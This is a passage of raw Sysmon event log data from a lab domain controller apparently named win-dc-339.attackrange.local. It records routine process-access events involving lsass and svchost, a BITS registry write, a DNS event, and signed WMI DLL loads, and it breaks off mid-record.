14:53:36.957{A7A01FEF-B626-607E-1100-00000000BB01}11766576C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000063136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.957{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.957{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.941{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x800000000000000063133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:34.904{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local56168- 10341000x800000000000000063132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.910{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000063131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.894{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.894{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.894{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.894{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.894{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.894{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.894{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.894{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.894{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.894{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.894{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000063120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:36.878{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BITS\Performance\PerfMMFileNameGlobal\MMF_BITS030287e2-819d-4485-9c3a-5d6f062ebf67 23542300x800000000000000063119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.816{A7A01FEF-EAF0-607E-6C0B-00000000BB01}6240NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\wbem\wmiprvse.exeC:\Windows\INF\disk.PNFMD5=4EFFFA1A69CC68965A020830F5849EB6,SHA256=B483BF142AF92CA4090161655EEB82EBFAE5BD835896B15A5680CD0824CC2C46,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.800{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EAF0-607E-6C0B-00000000BB01}6240C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.800{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EAF0-607E-6C0B-00000000BB01}6240C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000063116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.785{A7A01FEF-EAF0-607E-6C0B-00000000BB01}6240C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\wmiutils.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwmiutils.dllMD5=5179B0DEF3AB5CAC3BA02316AF1B6B40,SHA256=FA4112CB0D1A133C41FD001F958F0BE930BB49072BF97A3D765AEA8DB841ABC4,IMPHASH=EE3767E8CDC80CCB91A8FC0A7407A4A9trueMicrosoft WindowsValid 10341000x800000000000000063115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.785{A7A01FEF-B626-607E-1600-00000000BB01}15401316C:\Windows\system32\svchost.exe{A7A01FEF-EAF0-607E-6C0B-00000000BB01}6240C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000063114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.785{A7A01FEF-EAF0-607E-6C0B-00000000BB01}6240C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\wbemsvc.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemsvc.dllMD5=2BE97028B7B85762561F475E31989C2A,SHA256=75C9D8C6D41B4B7D70666A8107A08A748CEF6CB9E60AD0288B10CDE12E274AFF,IMPHASH=200200BEAF933FA4627BF83C67BA473EtrueMicrosoft WindowsValid 734700x800000000000000063113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.769{A7A01FEF-EAF0-607E-6C0B-00000000BB01}6240C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\wbemprox.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemprox.dllMD5=B7B56FAC395BEEDC20120FD0170A23A3,SHA256=7BDF579D7348D84F251A8411E40E14ADF9406F954914C1C4DE30E880DCF6CEB3,IMPHASH=96416B54C1F2E15EF294753DF1CB4131trueMicrosoft WindowsValid 10341000x800000000000000063112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.769{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EAF0-607E-6C0B-00000000BB01}6240C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000063111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.769{A7A01FEF-EAF0-607E-6C0B-00000000BB01}6240C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\fastprox.dll10.0.14393.0 (rs1_release.160715-1616)WMI Custom MarshallerMicrosoft® Windows® Operating SystemMicrosoft Corporationfastprox.dllMD5=C2F7834269D565263C65757EDE37A66C,SHA256=17651A35255229CE95F065CA1BCCC4867B43DA879D72AFCC91FBA4768225C7D3,IMPHASH=481A52B415277FC8692C7D6D9EA3475CtrueMicrosoft WindowsValid 734700x800000000000000063110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.753{A7A01FEF-EAF0-607E-6C0B-00000000BB01}6240C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbemcomn.dll10.0.14393.4283 (rs1_release.210303-1802)WMIMicrosoft® Windows® Operating SystemMicrosoft 